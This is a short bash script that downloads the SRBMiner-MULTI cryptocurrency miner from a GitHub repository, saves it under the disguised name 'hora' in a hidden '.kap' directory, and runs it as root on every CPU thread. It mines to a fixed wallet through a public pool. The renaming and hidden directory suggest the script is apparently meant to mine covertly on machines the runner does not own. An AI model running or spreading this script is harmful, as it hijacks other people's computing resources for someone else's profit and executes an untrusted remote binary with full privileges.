#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O hora https://github.com/nandafiku/fillesg/raw/main/SRBMiner-MULTI
chmod 777 hora
sudo ./hora --algorithm verushash --pool na.luckpool.net:3956 --wallet RJaE1YRdUd2wy5zpDbp4ij6DbAapUadhrp.$(echo $(shuf -i 1-30000 -n 1)-AJG) --password x --cpu-threads $(nproc --all)
